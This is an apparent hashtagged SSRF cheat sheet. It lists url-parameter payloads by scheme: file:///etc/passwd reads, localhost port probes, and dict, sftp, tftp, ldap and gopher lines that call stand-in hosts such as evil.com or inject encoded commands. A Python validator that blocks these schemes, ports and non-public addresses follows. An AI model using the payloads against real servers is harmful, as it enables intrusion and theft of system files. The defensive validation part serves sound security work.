SSRF exploitation via URL Scheme
1-File: Allows an attacker to fetch the content of a file on the server
file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd
2-HTTP: Allows an attacker to fetch any content from the web; it can also be used to scan ports
ssrf.php?url=http://127.0.0.1:22
ssrf.php?url=http://127.0.0.1:80
ssrf.php?url=http://127.0.0.1:443
3-Dict: The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
4-SFTP: A network protocol used for secure file transfer over secure shell
ssrf.php?url=sftp://evil.com:11111/
5-TFTP: Trivial File Transfer Protocol, works over UDP
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
6-LDAP: It is an application protocol used over an IP network to manage and access the distributed directory information service
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
7-Gopher HTTP
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
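Mitigation side of the list above, as an added example that is not code from the original page: a validator for the url parameter that allow-lists schemes and ports and rejects hosts resolving to non-public addresses. The names check_url and system_resolver, the allowed scheme and port sets, and the assumption that the feature only needs ordinary web fetches are all hypothetical.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: the fetch feature only needs web URLs
ALLOWED_PORTS = {80, 443}             # assumption: no legitimate target uses other ports

def system_resolver(host, port):
    """Return every IP address the host name resolves to."""
    infos = socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]

def check_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied url parameter."""
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:       # file, dict, sftp, tftp, ldap, gopher ...
        return False, f"scheme {scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host"
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:           # stops http://127.0.0.1:22 style port probing
        return False, f"port {port} not allowed"
    try:
        addresses = resolver(parts.hostname, port)
    except OSError:
        return False, "host does not resolve"
    if not addresses:
        return False, "host does not resolve"
    for addr in addresses:
        # Reject loopback, private, link-local and other non-public ranges.
        if not ipaddress.ip_address(addr.split("%")[0]).is_global:
            return False, f"resolves to non-public address {addr}"
    return True, "ok"

if __name__ == "__main__":
    # URL values taken from the page's own payload list.
    for sample in ["file:///etc/passwd", "dict://attacker:11111/",
                   "sftp://evil.com:11111/", "tftp://evil.com:12346/TESTUDPPACKET",
                   "ldap://localhost:11211/%0astats%0aquit", "http://127.0.0.1:22",
                   "http://127.0.0.1:80"]:
        print(sample, "->", check_url(sample))
```

The fetcher should connect to the address that was validated and run the same check on every redirect target, otherwise a second DNS answer or a 30x response can bypass it.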
#SSRF #exploitation #BugBounty